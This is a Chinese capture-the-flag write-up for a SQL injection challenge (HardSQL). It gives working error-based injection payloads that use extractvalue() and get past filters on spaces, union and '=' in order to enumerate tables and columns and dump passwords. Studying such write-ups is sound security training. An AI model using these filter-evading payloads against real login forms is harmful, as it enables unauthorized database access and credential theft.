[极客大挑战 2019]HardSQL

cl4y师傅出的又一道sqli

首先咱们进行fuzz,跑完以后显示出被过滤的非法字符:

 

　　过滤了union,空格,=等字符,咱们先输入一个'进行测试,发现回显报错,因而咱们尝试进行报错注入:

payload:?username=admin%27or(extractvalue(1,concat(%270x7e%27,version())))%23&password=123

　　尝试在username处进行注入;由于空格被过滤了,咱们在这里使用括号进行绕过;爆出来当前数据库的版本:

　　咱们已经能够肯定了注入方式和注入点,接下来就是一波老操做,在这里直接给出payload和回显图片("="被ban了因此咱们使用like进行代替)

payload:?username=admin%27or(extractvalue(1,concat(%270x7e%27,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))%23&password=123   //XPATH syntax error: 'x7eH4rDsq1',爆出表的名称为H4rDsq1

 

payload:?username=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))%23  //XPATH syntax error: '~id,username,password',爆出当前表中的三个字段

 

　　敏感信息应该是存在于password字段中,因而咱们尝试读取password的内容:

payload:?username=admin'or(extractvalue(1,concat('0x7e',(select(group_concat(password))from(H4rDsq1)))))%23&password=123

 

　　咱们已经成功爆出了flag,可是由于回显的字符串长度不够没法彻底读取flag的值,并且substr被禁用了,因而咱们使用right()函数进行读取

　　right(str,length)函数返回str的后length个字符,

payload:?username=admin'or(extractvalue(1,concat('0x7e',(select(group_concat(right(password,20)))from(H4rDsq1)))))%23&password=123

 

拼接后的flag:
flag{c4be14ce-1e03-4e19-8152-c2d222064351}